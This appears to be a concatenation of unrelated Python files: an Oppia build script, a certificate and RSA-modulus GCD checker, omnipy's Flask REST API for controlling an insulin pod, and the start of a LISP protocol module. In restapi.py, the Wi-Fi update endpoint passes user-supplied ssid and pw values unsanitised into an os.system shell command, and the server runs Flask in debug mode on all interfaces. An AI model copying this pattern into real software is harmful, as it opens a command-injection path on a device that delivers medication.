MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)])
_ensure_files_exist([
os.path.join(ASSETS_OUT_DIR, hash_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_js_final_filename),
os.path.join(
THIRD_PARTY_GENERATED_OUT_DIR, third_party_css_final_filename)])
def generate_hashes():
"""Generates hashes for files."""
# The keys for hashes are filepaths relative to the subfolders of the future
# /build folder. This is so that the replacing inside the HTML files works
# correctly.
hashes = dict()
# Create hashes for all directories and files.
hash_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir'],
THIRD_PARTY_GENERATED_DEV_DIR]
for hash_dir in hash_dirs:
hashes.update(get_file_hashes(hash_dir))
# Save hashes as JSON and write the JSON into JS file
# to make the hashes available to the frontend.
save_hashes_to_file(hashes)
# Update hash dict with newly created hashes.json.
hashes.update(
{HASHES_JSON_FILENAME: generate_md5_hash(HASHES_JSON_FILEPATH)})
# Make sure /assets/hashes.json is available to the frontend.
_ensure_files_exist([HASHES_JSON_FILEPATH])
return hashes
def generate_build_directory(hashes):
"""Generates hashes for files. Minifies files and interpolates paths
in HTMLs to include hashes. Renames the files to include hashes and copies
them into build directory.
"""
python_utils.PRINT('Building Oppia in production mode...')
build_tasks = collections.deque()
copy_tasks = collections.deque()
# Build files in /extensions and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
EXTENSIONS_DIRNAMES_TO_DIRPATHS)
# Minify all template files and copy them into staging directory.
build_tasks += generate_build_tasks_to_build_directory(
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS)
_execute_tasks(build_tasks)
# Copy all files from staging directory to production directory.
copy_input_dirs = [
ASSETS_DEV_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['staging_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['staging_dir'],
THIRD_PARTY_GENERATED_DEV_DIR,
WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
copy_output_dirs = [
ASSETS_OUT_DIR, EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir'],
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir'],
THIRD_PARTY_GENERATED_OUT_DIR, WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
assert len(copy_input_dirs) == len(copy_output_dirs)
for i in python_utils.RANGE(len(copy_input_dirs)):
safe_delete_directory_tree(copy_output_dirs[i])
copy_tasks += generate_copy_tasks_to_copy_from_source_to_target(
copy_input_dirs[i], copy_output_dirs[i], hashes)
_execute_tasks(copy_tasks)
_verify_hashes(copy_output_dirs, hashes)
source_dirs_for_assets = [ASSETS_DEV_DIR, THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_assets = [ASSETS_OUT_DIR, THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(source_dirs_for_assets, output_dirs_for_assets)
source_dirs_for_third_party = [THIRD_PARTY_GENERATED_DEV_DIR]
output_dirs_for_third_party = [THIRD_PARTY_GENERATED_OUT_DIR]
_compare_file_count(
source_dirs_for_third_party, output_dirs_for_third_party)
source_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['staging_dir']]
output_dirs_for_webpack = [WEBPACK_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(
source_dirs_for_webpack, output_dirs_for_webpack)
source_dirs_for_extensions = [
EXTENSIONS_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_extensions = [EXTENSIONS_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_extensions, output_dirs_for_extensions)
source_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['dev_dir']]
output_dirs_for_templates = [
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS['out_dir']]
_compare_file_count(source_dirs_for_templates, output_dirs_for_templates)
python_utils.PRINT('Build completed.')
def main(args=None):
"""The main method of this script."""
options = _PARSER.parse_args(args=args)
if options.maintenance_mode and not options.prod_env:
raise Exception(
'maintenance_mode should only be enabled in prod build.')
# Regenerate /third_party/generated from scratch.
safe_delete_directory_tree(THIRD_PARTY_GENERATED_DEV_DIR)
build_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
# If minify_third_party_libs_only is set to True, skips the rest of the
# build process once third party libs are minified.
if options.minify_third_party_libs_only:
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
return
else:
raise Exception(
'minify_third_party_libs_only should not be '
'set in non-prod env.')
modify_constants(
prod_env=options.prod_env,
emulator_mode=not options.deploy_mode,
maintenance_mode=options.maintenance_mode)
if options.prod_env:
minify_third_party_libs(THIRD_PARTY_GENERATED_DEV_DIR)
hashes = generate_hashes()
if options.deparallelize_terser:
if options.source_maps:
raise Exception(
'source_maps flag shouldn\'t be used with '
'deparallelize_terser flag.')
build_using_webpack(WEBPACK_TERSER_CONFIG)
elif options.source_maps:
build_using_webpack(WEBPACK_PROD_SOURCE_MAPS_CONFIG)
else:
build_using_webpack(WEBPACK_PROD_CONFIG)
generate_app_yaml(
deploy_mode=options.deploy_mode,
maintenance_mode=options.maintenance_mode)
generate_build_directory(hashes)
save_hashes_to_file(dict())
# The 'no coverage' pragma is used as this line is un-testable. This is because
# it will only be called when build.py is used as a script.
if __name__ == '__main__': # pragma: no cover
main()
|
main.py | import time, math
import os, sys
import numpy as np
from multiprocessing import Process, Lock
import cert_information as ci
dir = "./"+sys.argv[1].strip()
[subfolders] = os.walk(dir)
start = time.time()
for file in subfolders[2]:
domains = []
lock = Lock()
p = 10 # Number of threads
arq = open(dir+'/'+file, "r")
for domain in arq:
domains.append(domain.split(","))
arq.close()
if len(domains) > 0:
n = int(math.ceil(len(domains)/p))
Domains = [domains[i * n:(i + 1) * n] for i in range((len(domains) + n - 1) // n )]
domains.clear()
for i in range(len(Domains)):
ts = ci.CertificateSanityCheck(Domains[i], lock)
Process(target=ts.process_cert(), args=(lock,Domains[i],)).start()
print('Sorting and removing duplicate items...\nThis process may take some time.')
os.system("sort modulus_file.txt | uniq -u > modulus.txt")
os.system("sort ec_public_key_file.txt | uniq -u > ec_public_key.txt")
end = time.time()
print("Time used: ",end - start)
ts.ffmethod()
ts.calc_gcd()
|
restapi.py | #!/usr/bin/python3
from threading import Thread
import signal
import base64
from uuid import getnode as get_mac
from decimal import *
from threading import Lock
from Crypto.Cipher import AES
import simplejson as json
from flask import Flask, request, send_from_directory
from datetime import datetime
import time
from podcomm.pdm import Pdm, PdmLock
from podcomm.pod import Pod
from podcomm.pr_rileylink import RileyLink
from podcomm.definitions import *
from logging import FileHandler
from batt_check import SpiBatteryVoltageChecker
g_oldest_diff = None
g_time_diffs = []
g_key = None
g_pod = None
g_pdm = None
g_deny = False
g_tokens = []
g_token_lock = Lock()
g_battery_checker = SpiBatteryVoltageChecker()
app = Flask(__name__, static_url_path="/")
configureLogging()
logger = getLogger(with_console=True)
get_packet_logger(with_console=True)
class RestApiException(Exception):
def __init__(self, msg="Unknown"):
self.error_message = msg
def __str__(self):
return self.error_message
def _set_pod(pod):
global g_pod
global g_pdm
g_pod = pod
g_pod.path = DATA_PATH + POD_FILE + POD_FILE_SUFFIX
g_pod.path_db = DATA_PATH + POD_FILE + POD_DB_SUFFIX
g_pod.Save()
if g_pdm is not None:
g_pdm.stop_radio()
g_pdm = None
def _get_pod():
global g_pod
try:
if g_pod is None:
if os.path.exists(DATA_PATH + POD_FILE + POD_FILE_SUFFIX):
g_pod = Pod.Load(DATA_PATH + POD_FILE + POD_FILE_SUFFIX, DATA_PATH + POD_FILE + POD_DB_SUFFIX)
else:
g_pod = Pod()
g_pod.path = DATA_PATH + POD_FILE + POD_FILE_SUFFIX
g_pod.path_db = DATA_PATH + POD_FILE + POD_DB_SUFFIX
g_pod.Save()
return g_pod
except:
logger.exception("Error while loading pod")
return None
def _get_pdm():
global g_pdm
try:
if g_pdm is None:
g_pdm = Pdm(_get_pod())
return g_pdm
except:
logger.exception("Error while creating pdm instance")
return None
def _flush_handlers(logger):
for handler in logger.handlers:
if isinstance(handler, MemoryHandler):
handler.flush()
if isinstance(handler, FileHandler):
handler.flush()
handler.close()
def _archive_pod():
global g_pod
global g_pdm
try:
g_pod = None
g_pdm = None
archive_name = None
archive_suffix = datetime.utcnow().strftime("_%Y%m%d_%H%M%S")
if os.path.isfile(DATA_PATH + POD_FILE + POD_FILE_SUFFIX):
archive_name = DATA_PATH + POD_FILE + archive_suffix + POD_FILE_SUFFIX
os.rename(DATA_PATH + POD_FILE + POD_FILE_SUFFIX,
archive_name)
if os.path.isfile(DATA_PATH + POD_FILE + POD_DB_SUFFIX):
os.rename(DATA_PATH + POD_FILE + POD_DB_SUFFIX,
DATA_PATH + POD_FILE + archive_suffix + POD_DB_SUFFIX)
_flush_handlers(getLogger())
_flush_handlers(get_packet_logger())
if os.path.isfile(DATA_PATH + OMNIPY_PACKET_LOGFILE + LOGFILE_SUFFIX):
os.rename(DATA_PATH + OMNIPY_PACKET_LOGFILE + LOGFILE_SUFFIX,
DATA_PATH + OMNIPY_PACKET_LOGFILE + archive_suffix + LOGFILE_SUFFIX)
if os.path.isfile(DATA_PATH + OMNIPY_LOGFILE + LOGFILE_SUFFIX):
os.rename(DATA_PATH + OMNIPY_LOGFILE + LOGFILE_SUFFIX,
DATA_PATH + OMNIPY_LOGFILE + archive_suffix + LOGFILE_SUFFIX)
return archive_name
except:
logger.exception("Error while archiving existing pod")
def _get_battery_level():
global g_battery_checker
return g_battery_checker.get_measurement()
def _get_next_pod_address():
try:
try:
with open(DATA_PATH + LAST_ACTIVATED_FILE, "r") as lastfile:
addr = int(lastfile.readline(), 16)
blast = (addr & 0x0000000f) + 1
addr = (addr & 0xfffffff0) | (blast & 0x0000000f)
except:
mac = get_mac()
b0 = 0x34
b1 = (mac >> 12) & 0xff
b2 = (mac >> 4) & 0xff
b3 = (mac << 4) & 0xf0
addr = (b0 << 24) | (b1 << 16) | (b2 << 8) | b3
addr = addr | 0x00000008
return addr
except:
logger.exception("Error while getting next radio address")
def _save_activated_pod_address(addr):
try:
with open(DATA_PATH + LAST_ACTIVATED_FILE, "w") as lastfile:
lastfile.write(hex(addr))
except:
logger.exception("Error while storing activated radio address")
def _create_response(success, response, pod_status=None):
if pod_status is None:
pod_status = {}
elif pod_status.__class__ != dict:
pod_status = pod_status.__dict__
if response is None:
response = {}
elif response.__class__ != dict:
response = response.__dict__
return json.dumps({"success": success,
"response": response,
"status": pod_status,
"datetime": time.time(),
"api": {"version_major": API_VERSION_MAJOR, "version_minor": API_VERSION_MINOR,
"version_revision": API_VERSION_REVISION, "version_build": API_VERSION_BUILD},
"battery_level": _get_battery_level()
}, indent=4, sort_keys=True)
def _verify_auth(request_obj):
global g_deny
try:
if g_deny:
raise RestApiException("Pdm is shutting down")
i = request_obj.args.get("i")
a = request_obj.args.get("auth")
if i is None or a is None:
raise RestApiException("Authentication failed")
iv = base64.b64decode(i)
auth = base64.b64decode(a)
cipher = AES.new(g_key, AES.MODE_CBC, iv)
token = cipher.decrypt(auth)
with g_token_lock:
if token in g_tokens:
g_tokens.remove(token)
else:
raise RestApiException("Invalid authentication token")
except RestApiException:
logger.exception("Authentication error")
raise
except Exception:
logger.exception("Error during verify_auth")
raise
def _adjust_time(adjustment):
logger.info("Adjusting local time by %d ms" % adjustment)
pdm = _get_pdm()
if pdm is not None:
pdm.set_time_adjustment(adjustment / 1000)
def _api_result(result_lambda, generic_err_message):
global g_time_diffs, g_oldest_diff
try:
if g_deny:
raise RestApiException("Pdm is shutting down")
# if request.args.get('req_t') is not None:
# req_time = int(request.args.get('req_t'))
# local_time = int(time.time() * 1000)
# difference_ms = (req_time - local_time)
# if g_oldest_diff is None:
# g_oldest_diff = local_time
#
# if g_oldest_diff - local_time > 300:
# g_time_diffs = [difference_ms]
# g_oldest_diff = local_time
# else:
# g_time_diffs.append(difference_ms)
#
# if len(g_time_diffs) > 3:
# diff_avg = sum(g_time_diffs) / len(g_time_diffs)
# g_time_diffs = []
#
# if diff_avg > 30000 or diff_avg < -30000:
# _adjust_time(diff_avg)
return _create_response(True,
response=result_lambda(), pod_status=_get_pod())
except RestApiException as rae:
return _create_response(False, response=rae, pod_status=_get_pod())
except Exception as e:
logger.exception(generic_err_message)
return _create_response(False, response=e, pod_status=_get_pod())
def _get_pdm_address(timeout):
packet = None
with PdmLock():
try:
radio = _get_pdm().get_radio()
radio.stop()
packet = radio.get_packet(timeout)
finally:
radio.disconnect()
radio.start()
if packet is None:
raise RestApiException("No packet received")
return packet.address
def archive_pod():
_verify_auth(request)
pod = Pod()
_archive_pod()
_set_pod(pod)
def ping():
return {"pong": None}
def create_token():
token = bytes(os.urandom(16))
with g_token_lock:
g_tokens.append(token)
return {"token": base64.b64encode(token)}
def check_password():
_verify_auth(request)
def get_pdm_address():
_verify_auth(request)
timeout = 30000
if request.args.get('timeout') is not None:
timeout = int(request.args.get('timeout')) * 1000
if timeout > 30000:
raise RestApiException("Timeout cannot be more than 30 seconds")
address = _get_pdm_address(timeout)
return {"radio_address": address, "radio_address_hex": "%8X" % address}
def new_pod():
_verify_auth(request)
pod = Pod()
if request.args.get('id_lot') is not None:
pod.id_lot = int(request.args.get('id_lot'))
if request.args.get('id_t') is not None:
pod.id_t = int(request.args.get('id_t'))
if request.args.get('radio_address') is not None:
pod.radio_address = int(request.args.get('radio_address'))
else:
pod.radio_address = 0
if pod.radio_address == 0:
pod.radio_address = _get_pdm_address(45000)
_archive_pod()
_set_pod(pod)
def pair_pod():
_verify_auth(request)
pod = _get_pod()
if pod.state_progress >= PodProgress.Running:
pod = Pod()
_archive_pod()
_set_pod(pod)
pdm = _get_pdm()
req_address = _get_next_pod_address()
utc_offset = int(request.args.get('utc'))
pdm.pair_pod(req_address, utc_offset=utc_offset)
_save_activated_pod_address(req_address)
def activate_pod():
_verify_auth(request)
pdm = _get_pdm()
pdm.activate_pod()
def start_pod():
_verify_auth(request)
pdm = _get_pdm()
schedule=[]
for i in range(0,48):
rate = Decimal(request.args.get("h"+str(i)))
schedule.append(rate)
pdm.inject_and_start(schedule)
def _int_parameter(obj, parameter):
if request.args.get(parameter) is not None:
obj.__dict__[parameter] = int(request.args.get(parameter))
return True
return False
def _float_parameter(obj, parameter):
if request.args.get(parameter) is not None:
obj.__dict__[parameter] = float(request.args.get(parameter))
return True
return False
def _bool_parameter(obj, parameter):
if request.args.get(parameter) is not None:
val = str(request.args.get(parameter))
bval = False
if val == "1" or val.capitalize() == "TRUE":
bval = True
obj.__dict__[parameter] = bval
return True
return False
def set_pod_parameters():
_verify_auth(request)
pod = _get_pod()
try:
reset_nonce = False
if _int_parameter(pod, "id_lot"):
reset_nonce = True
if _int_parameter(pod, "id_t"):
reset_nonce = True
if reset_nonce:
pod.nonce_last = None
pod.nonce_seed = 0
if _int_parameter(pod, "radio_address"):
pod.radio_packet_sequence = 0
pod.radio_message_sequence = 0
_float_parameter(pod, "var_utc_offset")
_float_parameter(pod, "var_maximum_bolus")
_float_parameter(pod, "var_maximum_temp_basal_rate")
_float_parameter(pod, "var_alert_low_reservoir")
_int_parameter(pod, "var_alert_replace_pod")
_bool_parameter(pod, "var_notify_bolus_start")
_bool_parameter(pod, "var_notify_bolus_cancel")
_bool_parameter(pod, "var_notify_temp_basal_set")
_bool_parameter(pod, "var_notify_temp_basal_cancel")
_bool_parameter(pod, "var_notify_basal_schedule_change")
except:
raise
finally:
pod.Save()
def get_rl_info():
_verify_auth(request)
r = RileyLink()
return r.get_info()
def get_status():
_verify_auth(request)
t = request.args.get('type')
if t is not None:
req_type = int(t)
else:
req_type = 0
pdm = _get_pdm()
id = pdm.update_status(req_type)
return {"row_id":id}
def deactivate_pod():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.deactivate_pod()
_archive_pod()
return {"row_id":id}
def bolus():
_verify_auth(request)
pdm = _get_pdm()
amount = Decimal(request.args.get('amount'))
id = pdm.bolus(amount)
return {"row_id":id}
def cancel_bolus():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.cancel_bolus()
return {"row_id":id}
def set_temp_basal():
_verify_auth(request)
pdm = _get_pdm()
amount = Decimal(request.args.get('amount'))
hours = Decimal(request.args.get('hours'))
id = pdm.set_temp_basal(amount, hours, False)
return {"row_id":id}
def cancel_temp_basal():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.cancel_temp_basal()
return {"row_id":id}
def set_basal_schedule():
_verify_auth(request)
pdm = _get_pdm()
schedule=[]
for i in range(0,48):
rate = Decimal(request.args.get("h"+str(i)))
schedule.append(rate)
utc_offset = int(request.args.get("utc"))
pdm.pod.var_utc_offset = utc_offset
id = pdm.set_basal_schedule(schedule)
return {"row_id":id}
def is_pdm_busy():
pdm = _get_pdm()
return {"busy": pdm.is_busy()}
def acknowledge_alerts():
_verify_auth(request)
mask = Decimal(request.args.get('alertmask'))
pdm = _get_pdm()
id = pdm.acknowledge_alerts(mask)
return {"row_id":id}
def silence_alarms():
_verify_auth(request)
pdm = _get_pdm()
id = pdm.hf_silence_will_fall()
return {"row_id":id}
def shutdown():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("sudo shutdown -h")
return {"shutdown": time.time()}
def restart():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("sudo shutdown -r")
return {"restart": time.time()}
def update_omnipy():
global g_deny
_verify_auth(request)
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system("/bin/bash /home/pi/omnipy/scripts/pi-update.sh")
return {"update started": time.time()}
def update_wlan():
global g_deny
_verify_auth(request)
ssid = str(request.args.get('ssid'))
pw = str(request.args.get('pw'))
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(1)
os.system('/bin/bash /home/pi/omnipy/scripts/pi-setwifi.sh "%s" "%s"' % (ssid, pw))
return {"update started": time.time()}
def update_password():
global g_key
_verify_auth(request)
iv = base64.b64decode(request.args.get("i"))
pw_enc = base64.b64decode(request.args.get('pw'))
cipher = AES.new(g_key, AES.MODE_CBC, iv)
new_key = cipher.decrypt(pw_enc)
with open(DATA_PATH + KEY_FILE, "wb") as key_file:
key_file.write(new_key)
g_key = new_key
@app.route("/")
def main_page():
try:
return app.send_static_file("omnipy.html")
except:
logger.exception("Error while serving root file")
@app.route('/content/<path:path>')
def send_content(path):
try:
return send_from_directory("static", path)
except:
logger.exception("Error while serving static file from %s" % path)
@app.route(REST_URL_PING)
def a00():
return _api_result(lambda: ping(), "Failure while pinging")
@app.route(REST_URL_TOKEN)
def a01():
return _api_result(lambda: create_token(), "Failure while creating token")
@app.route(REST_URL_CHECK_PASSWORD)
def a02():
return _api_result(lambda: check_password(), "Failure while verifying password")
@app.route(REST_URL_GET_PDM_ADDRESS)
def a03():
return _api_result(lambda: get_pdm_address(), "Failure while reading address from PDM")
@app.route(REST_URL_NEW_POD)
def a04():
return _api_result(lambda: new_pod(), "Failure while creating a new pod")
@app.route(REST_URL_SET_POD_PARAMETERS)
def a05():
return _api_result(lambda: set_pod_parameters(), "Failure while setting parameters")
@app.route(REST_URL_RL_INFO)
def a06():
return _api_result(lambda: get_rl_info(), "Failure while getting RL info")
@app.route(REST_URL_STATUS)
def a07():
return _api_result(lambda: get_status(), "Failure while executing getting pod status")
@app.route(REST_URL_ACK_ALERTS)
def a08():
return _api_result(lambda: acknowledge_alerts(), "Failure while executing acknowledge alerts")
@app.route(REST_URL_DEACTIVATE_POD)
def a09():
return _api_result(lambda: deactivate_pod(), "Failure while executing deactivate pod")
@app.route(REST_URL_BOLUS)
def a10():
return _api_result(lambda: bolus(), "Failure while executing bolus")
@app.route(REST_URL_CANCEL_BOLUS)
def a11():
return _api_result(lambda: cancel_bolus(), "Failure while executing cancel bolus")
@app.route(REST_URL_SET_TEMP_BASAL)
def a12():
return _api_result(lambda: set_temp_basal(), "Failure while executing set temp basal")
@app.route(REST_URL_CANCEL_TEMP_BASAL)
def a13():
return _api_result(lambda: cancel_temp_basal(), "Failure while executing cancel temp basal")
@app.route(REST_URL_PDM_BUSY)
def a14():
return _api_result(lambda: is_pdm_busy(), "Failure while verifying if pdm is busy")
@app.route(REST_URL_OMNIPY_SHUTDOWN)
def a15():
return _api_result(lambda: shutdown(), "Failure while executing shutdown")
@app.route(REST_URL_OMNIPY_RESTART)
def a16():
return _api_result(lambda: restart(), "Failure while executing reboot")
@app.route(REST_URL_PAIR_POD)
def a165():
return _api_result(lambda: pair_pod(), "Failure while activating the pod")
@app.route(REST_URL_ACTIVATE_POD)
def a17():
return _api_result(lambda: activate_pod(), "Failure while activating the pod")
@app.route(REST_URL_START_POD)
def a18():
return _api_result(lambda: start_pod(), "Failure while starting a newly activated pod")
@app.route(REST_URL_SET_BASAL_SCHEDULE)
def a19():
return _api_result(lambda: set_basal_schedule(), "Failure while setting a basal schedule")
@app.route(REST_URL_ARCHIVE_POD)
def a20():
return _api_result(lambda: archive_pod(), "Failure while archiving pod")
@app.route(REST_URL_OMNIPY_UPDATE)
def a21():
return _api_result(lambda: update_omnipy(), "Failure while executing software update")
@app.route(REST_URL_OMNIPY_WIFI)
def a22():
return _api_result(lambda: update_wlan(), "Failure while updating wifi parameters")
@app.route(REST_URL_OMNIPY_CHANGE_PASSWORD)
def a23():
return _api_result(lambda: update_password(), "Failure while changing omnipy password")
@app.route(REST_URL_SILENCE_ALARMS)
def a24():
return _api_result(lambda: silence_alarms(), "Failure while silencing")
def _run_flask():
try:
app.run(host='0.0.0.0', port=4444, debug=True, use_reloader=False)
except:
logger.exception("Error while running rest api, exiting")
def _exit_with_grace(a, b):
try:
global g_deny
g_deny = True
pdm = _get_pdm()
while pdm.is_busy():
time.sleep(5)
_flush_handlers(getLogger())
_flush_handlers(get_packet_logger())
except:
logger.exception("error during graceful shutdown")
exit(0)
if __name__ == '__main__':
logger.info("Rest api is starting")
try:
with open(DATA_PATH + KEY_FILE, "rb") as keyfile:
g_key = keyfile.read(32)
except IOError:
logger.exception("Error while reading keyfile. Did you forget to set a password?")
raise
try:
os.system("sudo systemctl restart systemd-timesyncd && sudo systemctl daemon-reload")
except:
logger.exception("Error while reloading timesync daemon")
signal.signal(signal.SIGTERM, _exit_with_grace)
t = Thread(target=_run_flask)
t.setDaemon(True)
t.start()
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
_exit_with_grace(0, 0)
|
lisp.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by a instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll has the first long of a ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to stare NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error proessing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# site behind a NAT device.
#
